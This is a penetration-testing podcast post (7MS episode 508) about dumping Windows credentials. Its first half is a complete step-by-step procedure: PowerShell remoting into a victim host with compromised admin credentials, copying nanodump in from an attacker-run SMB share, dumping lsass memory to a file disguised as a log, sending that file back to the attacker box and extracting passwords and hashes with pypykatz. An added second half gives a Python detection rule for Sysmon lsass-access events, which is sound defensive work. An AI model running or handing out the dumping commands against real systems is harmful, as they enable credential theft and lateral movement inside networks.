7MS #508: Tales of Pentest Pwnage - Part 33
Hey friends! We have another fun tale of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.
We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike but can also be compiled standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it; you just have to create the folder first). So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:
# Windows system: tell your Windows system to trust the victim host you're about to PS into:
winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"}
# Windows system: PowerShell into the victim system
Enter-PSSession -ComputerName VICTIM-SERVER -Credential domain.com\pwneduser
# Kali system: create and share a folder with nanodump.exe in it:
sudo mkdir /share
sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support
# Victim system: copy nanodump from Kali box to VICTIM-SERVER
copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\
# Victim system: get the PID for lsass.exe
tasklist /FI "IMAGENAME eq lsass.exe"
# Victim system: use nano to do the lsass dump
c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log
# Victim system: Get the log back to your Kali share
copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRESS\share\
# Kali system: "fix" the dump and extract credz with mimikatz!
sudo /opt/nanodump/restore_signature.sh toteslegit.log
sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt
Enjoy delicious passwords and hashes in the dump.txt file!
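For the blue team side of the procedure above, here is an added example (not from the 7MS post or the nanodump project) that hunts for the lsass.exe memory-read step in Sysmon Event ID 10 (ProcessAccess) records. The field names follow Sysmon's ProcessAccess schema; the allow-list and the sample events are constructed assumptions to tune per environment.

```python
# Added example: flag unexpected processes that open lsass.exe with read access.
# Sample records are constructed to mimic Sysmon Event ID 10 (ProcessAccess) fields.

# Access-mask bits from the Win32 PROCESS_* constants.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Source images that legitimately touch lsass.exe on a typical host (assumption; tune per fleet).
KNOWN_GOOD_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allow-listed process requests read access to lsass memory."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    granted = int(event["GrantedAccess"], 16)
    if not granted & PROCESS_VM_READ:
        return False  # query-only handles cannot read credential material
    return event["SourceImage"].lower() not in KNOWN_GOOD_SOURCES


def hunt(events):
    """Return the subset of ProcessAccess events worth an alert."""
    return [e for e in events if is_suspicious_lsass_access(e)]


# Constructed sample telemetry: one benign parent, one dumper, one query-only handle, one non-lsass target.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\wininit.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\Temp\nano.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Windows\Temp\nano.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"ALERT {hit['SourceImage']} -> lsass.exe GrantedAccess={hit['GrantedAccess']}")
```

A handle obtained indirectly shows up under a different SourceImage, so correlate these hits with file writes to locations like c:\windows\temp and outbound SMB copies rather than relying on this rule alone.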